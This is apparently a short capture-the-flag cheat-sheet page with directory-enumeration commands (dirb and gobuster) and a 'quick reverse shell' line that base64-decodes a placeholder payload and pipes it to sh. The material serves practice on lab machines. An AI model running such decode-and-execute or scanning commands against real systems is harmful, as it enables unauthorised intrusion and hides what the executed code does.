Useful websites and materials
This page contains useful websites and commands for carrying out CTF
Useful websites
Content Discovery
dirb http://MACHINE_IP/ common.txtgobuster dir --url http://MACHINE_IP/ -w common.txtQuick reverse shell
echo "<PayloadBASE64>" | base64 -d | shLast updated